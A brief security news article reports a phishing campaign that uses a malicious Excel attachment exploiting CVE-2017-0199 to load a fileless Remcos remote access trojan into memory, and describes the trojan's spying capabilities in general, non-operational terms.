Researchers have uncovered a sophisticated phishing campaign deploying a fileless variant of the Remcos Remote Access Trojan (RAT), a commercial malware exploited by threat actors to control victims' computers and siphon sensitive information.
The attack, discovered by Fortinet's FortiGuard Labs, starts with a phishing email masquerading as a purchase order, tricking recipients into opening a Microsoft Excel attachment. The attachment exploits CVE-2017-0199, a known remote code execution vulnerability in Microsoft Office to trigger the infection process.
Once activated, the compromised Excel document initiates a download of an HTML Application (HTA) file from an external server. Utilizing the legitimate Windows utility mshta.exe, the HTA file the process of deobfuscating via JavaScript, Visual Basic Script, and PowerShell.
The campaign incorporates complex anti-analysis and anti-debugging tactics. The payload does not store Remcos RAT on disk but directly injects it into the computer’s memory.
Once active, Remcos RAT can collect system metadata, execute commands, harvest files, and manipulate Windows services and the registry. Additionally, it allows attackers to capture clipboard data, alter desktop settings, access the device’s camera and microphone, record the screen, disable input devices, and deploy more malware, posing a severe security threat.
Last week, reports emerged that malicious actors started misusing DocuSign’s Envelopes API to distribute fraudulent invoices that mimic well-known brands, including Norton and PayPal.